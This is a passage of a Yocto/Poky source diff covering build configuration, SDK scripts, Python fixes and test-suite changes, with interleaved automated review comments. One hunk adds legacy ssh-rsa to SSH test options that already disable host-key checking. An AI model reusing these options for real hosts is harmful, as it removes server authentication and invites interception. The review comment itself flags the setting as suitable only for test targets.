@@ -6,9 +6,9 @@ # to the distro running on the build machine. # -UNINATIVE_MAXGLIBCVERSION = "2.33" +UNINATIVE_MAXGLIBCVERSION = "2.34" -UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.2/" -UNINATIVE_CHECKSUM[aarch64] ?= "4f0872cdca2775b637a8a99815ca5c8dd42146abe903a24a50ee0448358c764b" -UNINATIVE_CHECKSUM[i686] ?= "e2eeab92e67263db37d9bb6d4c58579abd1f47ff4cded3171bde572fece124b2" -UNINATIVE_CHECKSUM[x86_64] ?= "3ee8c7d55e2d4c7ae3887cddb97219f97b94efddfeee2e24923c0cb0e8ce84c6" +UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.4/" +UNINATIVE_CHECKSUM[aarch64] ?= "3013cdda8f0dc6639ce1c80f33eabce66f06b890bd5b58739a6d7a92a0bb7100" +UNINATIVE_CHECKSUM[i686] ?= "abed500de584aad63ec237546db20cdd0c69d8870a6f8e94ac31721ace64b376" +UNINATIVE_CHECKSUM[x86_64] ?= "126f4f7f6f21084ee140dac3eb4c536b963837826b7c38599db0b512c3377ba2" diff --git a/poky/meta/conf/layer.conf b/poky/meta/conf/layer.conf index 1c432275be..7453655417 100644 --- a/poky/meta/conf/layer.conf +++ b/poky/meta/conf/layer.conf @@ -102,4 +102,4 @@ SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native" # We need to keep bitbake tools in PATH # Avoid empty path entries BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}" -PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' is not '' else ''}${HOSTTOOLS_DIR}" +PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}" diff --git a/poky/meta/conf/multilib.conf b/poky/meta/conf/multilib.conf index d231107f8b..e9767c73b6 100644 --- a/poky/meta/conf/multilib.conf +++ b/poky/meta/conf/multilib.conf @@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot" RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot" RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot" +PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot" + INHERIT += "multilib_global" BBCLASSEXTEND_append = " ${MULTILIBS}" 
diff --git a/poky/meta/files/common-licenses/Unlicense b/poky/meta/files/common-licenses/Unlicense new file mode 100644 index 0000000000..68a49daad8 --- /dev/null +++ b/poky/meta/files/common-licenses/Unlicense @@ -0,0 +1,24 @@ +This is free and unencumbered software released into the public domain. + +Anyone is free to copy, modify, publish, use, compile, sell, or +distribute this software, either in source code form or as a compiled +binary, for any purpose, commercial or non-commercial, and by any +means. + +In jurisdictions that recognize copyright laws, the author or authors +of this software dedicate any and all copyright interest in the +software to the public domain. We make this dedication for the benefit +of the public at large and to the detriment of our heirs and +successors. We intend this dedication to be an overt act of +relinquishment in perpetuity of all present and future rights to this +software under copyright law. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR +OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, +ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +OTHER DEALINGS IN THE SOFTWARE. + +For more information, please refer to <http://unlicense.org/> diff --git a/poky/meta/files/toolchain-shar-extract.sh b/poky/meta/files/toolchain-shar-extract.sh index dd9342758b..4386b985bb 100644 --- a/poky/meta/files/toolchain-shar-extract.sh +++ b/poky/meta/files/toolchain-shar-extract.sh @@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then exit 1 fi -DEFAULT_INSTALL_DIR="@SDKPATH@" +SDK_BUILD_PATH="@SDKPATH@" +DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@" SUDO_EXEC="" EXTRA_TAR_OPTIONS="" target_sdk_dir="" 
diff --git a/poky/meta/files/toolchain-shar-relocate.sh b/poky/meta/files/toolchain-shar-relocate.sh index ba873373e2..3ece04db0a 100644 --- a/poky/meta/files/toolchain-shar-relocate.sh +++ b/poky/meta/files/toolchain-shar-relocate.sh @@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \ -e "$target_sdk_dir/post-relocate-setup" \ -e "$target_sdk_dir/${0##*/}" | \ xargs -n100 $SUDO_EXEC sed -i \ - -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \ + -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \ -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \ -e "s: /usr/bin/perl: /usr/bin/env perl:g" diff --git a/poky/meta/lib/buildstats.py b/poky/meta/lib/buildstats.py index 8627ed3c31..c52b6c3b72 100644 --- a/poky/meta/lib/buildstats.py +++ b/poky/meta/lib/buildstats.py @@ -43,8 +43,8 @@ class SystemStats: # depends on the heartbeat event, which fires less often. self.min_seconds = 1 - self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') - self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') + self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') + self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') self.diskstats_ltime = None self.diskstats_data = None self.stat_ltimes = None diff --git a/poky/meta/lib/oe/license.py b/poky/meta/lib/oe/license.py index c1274a61de..c4efbe142b 100644 --- a/poky/meta/lib/oe/license.py +++ b/poky/meta/lib/oe/license.py @@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor): def visit_Str(self, node): self.licenses.append(node.s) + def visit_Constant(self, node): + self.licenses.append(node.value) + def visit_BinOp(self, node): if isinstance(node.op, ast.BitOr): left = FlattenVisitor(self.choose_licenses) 
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor): def visit_Str(self, node): self.licenses.add(node.s) + def visit_Constant(self, node): + self.licenses.add(node.value) + def list_licenses(licensestr): """Simply get a list of all licenses mentioned in a license string. Binary operators are not applied or taken into account in any way""" diff --git a/poky/meta/lib/oe/reproducible.py b/poky/meta/lib/oe/reproducible.py index 204b9bd734..0938e4cb39 100644 --- a/poky/meta/lib/oe/reproducible.py +++ b/poky/meta/lib/oe/reproducible.py @@ -41,7 +41,7 @@ def find_git_folder(d, sourcedir): for root, dirs, files in os.walk(workdir, topdown=True): dirs[:] = [d for d in dirs if d not in exclude] if '.git' in dirs: - return root + return os.path.join(root, ".git") bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir) return None diff --git a/poky/meta/lib/oe/utils.py b/poky/meta/lib/oe/utils.py index 83d298906b..3e016244c5 100644 --- a/poky/meta/lib/oe/utils.py +++ b/poky/meta/lib/oe/utils.py @@ -481,7 +481,8 @@ class ThreadedWorker(Thread): try: func(self, *args, **kargs) except Exception as e: - print(e) + # Eat all exceptions + bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e) finally: self.tasks.task_done() diff --git a/poky/meta/lib/oeqa/core/target/ssh.py b/poky/meta/lib/oeqa/core/target/ssh.py index aefb576805..af4a67f266 100644 --- a/poky/meta/lib/oeqa/core/target/ssh.py +++ b/poky/meta/lib/oeqa/core/target/ssh.py @@ -34,6 +34,7 @@ class OESSHTarget(OETarget): self.timeout = timeout self.user = user ssh_options = [ + '-o', 'HostKeyAlgorithms=+ssh-rsa', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'StrictHostKeyChecking=no', '-o', 'LogLevel=ERROR' diff --git a/poky/meta/lib/oeqa/manual/eclipse-plugin.json b/poky/meta/lib/oeqa/manual/eclipse-plugin.json index d77d0e673b..6c110d0656 100644 --- a/poky/meta/lib/oeqa/manual/eclipse-plugin.json +++ b/poky/meta/lib/oeqa/manual/eclipse-plugin.json 
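Review bot: The added `'-o', 'HostKeyAlgorithms=+ssh-rsa'` in `OESSHTarget.__init__` re-enables the SHA-1 based `ssh-rsa` host key algorithm for every connection, and it sits next to `UserKnownHostsFile=/dev/null` and `StrictHostKeyChecking=no`, so these sessions carry no server authentication at all. That is a reasonable trade-off for throwaway test targets, presumably ones that only offer RSA host keys, but nothing in the list says so. I would add above `ssh_options` a comment like `# Test targets only: host keys are not verified and legacy ssh-rsa is accepted; do not reuse these options for real hosts.` The `__init__` body continues outside the hunk.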
@@ -44,7 +44,7 @@ "expected_results": "" }, "2": { - "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", + "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", "expected_results": " Qemu can be lauched normally." }, "3": { @@ -60,7 +60,7 @@ "expected_results": "" }, "6": { - "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", + "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", "expected_results": "" }, "7": { 
@@ -247,7 +247,7 @@ "execution": { "1": { "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n", - "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" + "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" }, "2": { "action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n", diff --git a/poky/meta/lib/oeqa/runtime/cases/ksample.py b/poky/meta/lib/oeqa/runtime/cases/ksample.py index a9a1620ebd..9883aa9aa8 100644 --- a/poky/meta/lib/oeqa/runtime/cases/ksample.py +++ b/poky/meta/lib/oeqa/runtime/cases/ksample.py @@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends from oeqa.core.decorator.data import skipIfNotFeature # need some kernel fragments -# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf +# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf class KSample(OERuntimeTestCase): def cmd_and_check(self, cmd='', match_string=''): status, output = self.target.run(cmd) diff --git a/poky/meta/lib/oeqa/runtime/cases/parselogs.py b/poky/meta/lib/oeqa/runtime/cases/parselogs.py index f703927660..1cac59725d 100644 --- a/poky/meta/lib/oeqa/runtime/cases/parselogs.py +++ b/poky/meta/lib/oeqa/runtime/cases/parselogs.py 
@@ -32,7 +32,7 @@ common_errors = [ "Failed to load module \"fbdev\"", "Failed to load module fbdev", "Failed to load module glx", - "[drm] Cannot find any crtc or sizes - going 1024x768", + "[drm] Cannot find any crtc or sizes", "_OSC failed (AE_NOT_FOUND); disabling ASPM", "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)", "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!", @@ -61,6 +61,8 @@ common_errors = [ "[rdrand]: Initialization Failed", "[pulseaudio] authkey.c: Failed to open cookie file", "[pulseaudio] authkey.c: Failed to load authentication key", + "was skipped because of a failed condition check", + "was skipped because all trigger condition checks failed", ] video_related = [ @@ -90,6 +92,7 @@ qemux86_common = [ "glamor initialization failed", "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)", "floppy: error", + 'failed to IDENTIFY (I/O error, err_mask=0x4)', ] + common_errors ignore_errors = { @@ -295,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase): grepcmd = 'grep ' grepcmd += '-Ei "' for error in errors: - grepcmd += '\<' + error + '\>' + '|' + grepcmd += r'\<' + error + r'\>' + '|' grepcmd = grepcmd[:-1] grepcmd += '" ' + str(log) + " | grep -Eiv \'" 
@@ -306,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase): errorlist = ignore_errors['default'] for ignore_error in errorlist: - ignore_error = ignore_error.replace('(', '\(') - ignore_error = ignore_error.replace(')', '\)') + ignore_error = ignore_error.replace('(', r'\(') + ignore_error = ignore_error.replace(')', r'\)') ignore_error = ignore_error.replace("'", '.') - ignore_error = ignore_error.replace('?', '\?') - ignore_error = ignore_error.replace('[', '\[') - ignore_error = ignore_error.replace(']', '\]') - ignore_error = ignore_error.replace('*', '\*') + ignore_error = ignore_error.replace('?', r'\?') + ignore_error = ignore_error.replace('[', r'\[') + ignore_error = ignore_error.replace(']', r'\]') + ignore_error = ignore_error.replace('*', r'\*') ignore_error = ignore_error.replace('0-9', '[0-9]') grepcmd += ignore_error + '|' grepcmd = grepcmd[:-1] diff --git a/poky/meta/lib/oeqa/runtime/context.py b/poky/meta/lib/oeqa/runtime/context.py index 3826f27642..d707ab263a 100644 --- a/poky/meta/lib/oeqa/runtime/context.py +++ b/poky/meta/lib/oeqa/runtime/context.py @@ -5,6 +5,7 @@ # import os +import sys from oeqa.core.context import OETestContext, OETestContextExecutor from oeqa.core.target.ssh import OESSHTarget @@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # XXX: Don't base your targets on this code it will be refactored # in the near future. # Custom target module loading - target_modules_path = kwargs.get('target_modules_path', '') - controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path) + controller = OERuntimeTestContextExecutor.getControllerModule(target_type) target = controller(logger, target_ip, server_ip, **kwargs) return target 
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # AttributeError raised if not found. # ImportError raised if a provided module can not be imported. @staticmethod - def getControllerModule(target, target_modules_path): - controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path) + def getControllerModule(target): + controllerslist = OERuntimeTestContextExecutor._getControllerModulenames() controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist) return controller # Return a list of all python modules in lib/oeqa/controllers for each # layer in bbpath @staticmethod - def _getControllerModulenames(target_modules_path): + def _getControllerModulenames(): controllerslist = [] @@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): else: raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module) - extpath = target_modules_path.split(':') - for p in extpath: - controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers') + for p in sys.path: + controllerpath = os.path.join(p, 'oeqa', 'controllers') if os.path.exists(controllerpath): add_controller_list(controllerpath) return controllerslist 
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor): # Search for and return a controller or None from given module name @staticmethod def _loadControllerFromModule(target, modulename): - obj = None - # import module, allowing it to raise import exception - module = __import__(modulename, globals(), locals(), [target]) - # look for target class in the module, catching any exceptions as it - # is valid that a module may not have the target class. try: - obj = getattr(module, target) - except: - obj = None - return obj + import importlib + module = importlib.import_module(modulename) + return getattr(module, target) + except AttributeError: + return None @staticmethod def readPackagesManifest(manifest): diff --git a/poky/meta/lib/oeqa/selftest/cases/bbtests.py b/poky/meta/lib/oeqa/selftest/cases/bbtests.py index dc423ec439..e659be5341 100644 --- a/poky/meta/lib/oeqa/selftest/cases/bbtests.py +++ b/poky/meta/lib/oeqa/selftest/cases/bbtests.py @@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\" self.delete_recipeinc('man-db') self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output) self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output) - line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.') - self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \ -doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output) def test_rename_downloaded_file(self): # TODO unique dldir instead of using cleanall 
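Review bot: In `_loadControllerFromModule` the new `try` wraps `importlib.import_module(modulename)` as well as the `getattr`, so an `AttributeError` raised while the controller module itself is being imported is swallowed and returned as `None`, i.e. reported as "no such controller". The removed code imported outside the `try` on purpose, with a comment that import exceptions should propagate. Keeping `module = importlib.import_module(modulename)` outside any handler and ending with `return getattr(module, target, None)` restores that behaviour in two lines. `import importlib` would also sit better with the module-level imports, where this commit already adds `import sys`.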
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\" """) self.track_for_cleanup(os.path.join(self.builddir, "download-selftest")) - data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' + data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' self.write_recipeinc('aspell', data) result = bitbake('-f -c fetch aspell', ignore_status=True) self.delete_recipeinc('aspell') diff --git a/poky/meta/lib/oeqa/selftest/cases/devtool.py b/poky/meta/lib/oeqa/selftest/cases/devtool.py index 0985434238..87e71632ab 100644 --- a/poky/meta/lib/oeqa/selftest/cases/devtool.py +++ b/poky/meta/lib/oeqa/selftest/cases/devtool.py @@ -340,7 +340,7 @@ class DevtoolAddTests(DevtoolBase): checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263' checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '0.1+git${SRCPV}' - checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https' + checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master' checkvars['SRCREV'] = srcrev checkvars['DEPENDS'] = set(['dbus']) self._test_recipe_contents(recipefile, checkvars, []) @@ -442,6 +442,7 @@ class DevtoolAddTests(DevtoolBase): tempdir = tempfile.mkdtemp(prefix='devtoolqa') self.track_for_cleanup(tempdir) url = 'gitsm://git.yoctoproject.org/mraa' + url_branch = '%s;branch=master' % url checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d' testrecipe = 'mraa' srcdir = os.path.join(tempdir, testrecipe) @@ -462,7 +463,7 @@ class DevtoolAddTests(DevtoolBase): checkvars = {} checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '1.0+git${SRCPV}' - checkvars['SRC_URI'] = url + checkvars['SRC_URI'] = url_branch checkvars['SRCREV'] = '${AUTOREV}' self._test_recipe_contents(recipefile, checkvars, []) # Try with revision and version specified 
@@ -481,7 +482,7 @@ class DevtoolAddTests(DevtoolBase): checkvars = {} checkvars['S'] = '${WORKDIR}/git' checkvars['PV'] = '1.5+git${SRCPV}' - checkvars['SRC_URI'] = url + checkvars['SRC_URI'] = url_branch checkvars['SRCREV'] = checkrev self._test_recipe_contents(recipefile, checkvars, []) @@ -880,7 +881,7 @@ class DevtoolUpdateTests(DevtoolBase): self._check_repo_status(os.path.dirname(recipefile), expected_status) result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile)) - addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"'] + addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"'] srcurilines = src_uri.split() srcurilines[0] = 'SRC_URI = "' + srcurilines[0] srcurilines.append('"') diff --git a/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt new file mode 100644 index 0000000000..f70f10e4db --- /dev/null +++ b/poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt @@ -0,0 +1 @@ +A diff --git a/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt new file mode 100644 index 0000000000..223b7836fb --- /dev/null +++ b/poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt @@ -0,0 +1 @@ +B diff --git a/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py b/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py index 3119520f0d..59f80aad28 100644 --- a/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py +++ b/poky/meta/lib/oeqa/selftest/cases/gotoolchain.py 
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase): @classmethod def tearDownClass(cls): + # Go creates file which are readonly + for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA): + for filename in filenames + dirnames: + f = os.path.join(dirpath, filename) + if not os.path.islink(f): + os.chmod(f, 0o775) shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True) super(oeGoToolchainSelfTest, cls).tearDownClass() diff --git a/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py b/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py index 2b9c4998f7..535d80cb86 100644 --- a/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py +++ b/poky/meta/lib/oeqa/selftest/cases/imagefeatures.py @@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group" def test_no_busybox_base_utils(self): config = """ # Enable x11 -DISTRO_FEATURES_append += "x11" +DISTRO_FEATURES_append = " x11" # Switch to systemd DISTRO_FEATURES += "systemd" diff --git a/poky/meta/lib/oeqa/selftest/cases/recipetool.py b/poky/meta/lib/oeqa/selftest/cases/recipetool.py index c2ade2543a..e8aeea3023 100644 --- a/poky/meta/lib/oeqa/selftest/cases/recipetool.py +++ b/poky/meta/lib/oeqa/selftest/cases/recipetool.py @@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase): tempsrc = os.path.join(self.tempdir, 'srctree') os.makedirs(tempsrc) recipefile = os.path.join(self.tempdir, 'libmatchbox.bb') - srcuri = 'git://git.yoctoproject.org/libmatchbox' + srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master' result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc]) self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) checkvars = {} 
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase): self.assertTrue(os.path.isfile(recipefile)) checkvars = {} checkvars['LICENSE'] = set(['Apache-2.0']) - checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https' + checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master' inherits = ['setuptools3'] self._test_recipe_contents(recipefile, checkvars, inherits) @@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase): self.assertTrue(os.path.isfile(recipefile)) checkvars = {} checkvars['LICENSE'] = set(['GPLv2']) - checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http' + checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master' inherits = ['pkgconfig', 'autotools'] self._test_recipe_contents(recipefile, checkvars, inherits) diff --git a/poky/meta/lib/oeqa/selftest/cases/reproducible.py b/poky/meta/lib/oeqa/selftest/cases/reproducible.py index 0e44ce4dbf..4b606e7e64 100644 --- a/poky/meta/lib/oeqa/selftest/cases/reproducible.py +++ b/poky/meta/lib/oeqa/selftest/cases/reproducible.py @@ -31,7 +31,6 @@ exclude_packages = [ 'bootchart2-doc', 'epiphany', 'gcr', - 'git', 'glide', 'go-dep', 'go-helloworld', @@ -44,7 +43,6 @@ exclude_packages = [ 'libcap-ng', 'libjson', 'libproxy', - 'lsb-release', 'lttng-tools-dbg', 'lttng-tools-ptest', 'ltp', @@ -55,14 +53,12 @@ exclude_packages = [ 'pybootchartgui', 'qemu', 'quilt-ptest', - "rpm", 'rsync', 'ruby', 'stress-ng', 'systemd-bootchart', 'systemtap', 'valgrind-ptest', - 'vim', 'webkitgtk', ] 
@@ -144,6 +140,32 @@ def compare_file(reference, test, diffutils_sysroot): result.status = SAME return result +def run_diffoscope(a_dir, b_dir, html_dir, **kwargs): + return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir], + **kwargs) + +class DiffoscopeTests(OESelftestTestCase): + diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope") + + def test_diffoscope(self): + bitbake("diffoscope-native -c addto_recipe_sysroot") + diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native") + + # Check that diffoscope doesn't return an error when the files compare + # the same (a general check that diffoscope is working) + with tempfile.TemporaryDirectory() as tmpdir: + run_diffoscope('A', 'A', tmpdir, + native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files) + + # Check that diffoscope generates an index.html file when the files are + # different + with tempfile.TemporaryDirectory() as tmpdir: + r = run_diffoscope('A', 'B', tmpdir, + native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files) + + self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected") + self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!") + class ReproducibleTests(OESelftestTestCase): # Test the reproducibility of whatever is built between sstate_targets and targets 
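Review bot: In test_diffoscope the differing-files case only asserts `r.status != 0`, so a diffoscope failure is accepted the same way as a reported difference. diffoscope's documented exit status is 1 for differences and 2 for trouble, so `self.assertEqual(r.status, 1, msg="diffoscope did not report a difference")` pins the intended outcome. The collapsed layout does not show whether the two assertions sit inside the second `with tempfile.TemporaryDirectory()` block; the index.html check is only meaningful if they do, because the directory is removed on exit. run_diffoscope would also benefit from a docstring such as `"""Run diffoscope on a_dir and b_dir, writing the HTML report to html_dir; kwargs go to runCmd."""`.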
@@ -321,7 +343,7 @@ class ReproducibleTests(OESelftestTestCase): # Copy jquery to improve the diffoscope output usability self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js')) - runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'], + run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir, native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir) if fails: diff --git a/poky/meta/lib/oeqa/selftest/cases/runtime_test.py b/poky/meta/lib/oeqa/selftest/cases/runtime_test.py index 353d411681..20dc1c9482 100644 --- a/poky/meta/lib/oeqa/selftest/cases/runtime_test.py +++ b/poky/meta/lib/oeqa/selftest/cases/runtime_test.py @@ -179,6 +179,12 @@ class TestImage(OESelftestTestCase): self.skipTest('virgl isn\'t working with Debian 8') if distro and distro == 'centos-7': self.skipTest('virgl isn\'t working with Centos 7') + if distro and distro == 'centos-8': + self.skipTest('virgl isn\'t working with Centos 8') + if distro and distro == 'fedora-34': + self.skipTest('virgl isn\'t working with Fedora 34') + if distro and distro == 'fedora-35': + self.skipTest('virgl isn\'t working with Fedora 35') if distro and distro == 'opensuseleap-15.0': self.skipTest('virgl isn\'t working with Opensuse 15.0') @@ -216,6 +222,7 @@ class TestImage(OESelftestTestCase): Author: Alexander Kanavin <alex.kanavin@gmail.com> """ import subprocess, os + self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527") try: content = os.listdir("/dev/dri") if len([i for i in content if i.startswith('render')]) == 0: diff --git a/poky/meta/lib/oeqa/selftest/cases/sstatetests.py b/poky/meta/lib/oeqa/selftest/cases/sstatetests.py index c46e8ba489..1bfe88c87d 100644 --- a/poky/meta/lib/oeqa/selftest/cases/sstatetests.py 
